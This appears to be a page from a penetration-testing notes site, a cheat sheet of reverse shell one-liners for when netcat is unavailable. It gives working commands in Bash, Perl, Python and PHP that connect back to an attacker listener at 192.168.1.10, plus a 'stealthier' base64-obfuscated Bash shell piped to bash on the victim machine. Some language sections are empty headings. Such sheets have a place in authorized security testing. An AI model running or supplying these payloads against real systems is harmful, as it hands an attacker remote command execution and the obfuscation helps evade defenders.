search

Alternate Reverse Shells

Many a times reverse shells using netcat may not be possible as the tool by itself will not be installed on that system. Under such circumstances it is better to use other scripting languages or tools to initiate the reverse shell. Here are some of the reverse shell commands using various technologies,

circle-info

Netcat should be started on your system before any of the following commands are executed. For these examples we will assume netcat to be listening on IP 192.168.1.10 and port 80

chevron-rightBashhashtag
bash -i >& /dev/tcp/192.168.1.10/80 0>&1
chevron-rightStealthier Methodhashtag

#Base64 encode command using,

echo "bash -c 'bash -i >& /dev/tcp/192.168.45.2/443 0>&1'" | base64 -w0

#Use the output in the victim machine with base64 decode command,

echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null

chevron-rightPerlhashtag
perl -e 'use Socket;$i="192.168.1.10";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
chevron-rightPythonhashtag
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.10",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
chevron-rightPHPhashtag
php -r '$sock=fsockopen("192.168.1.10",80);exec("/bin/sh -i <&3 >&3 2>&3");'
chevron-rightRubyhashtag
chevron-rightNetcathashtag

I am including netcat as well for easy reference,

If the client has the wrong version of netcat, then the following command may come in handy as pointed out by Jeff Price,

chevron-rightJavahashtag

hashtag
Other Resources

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#pythonarrow-up-right

PreviousRemote ShellNextMove to Interactive Shell

Last updated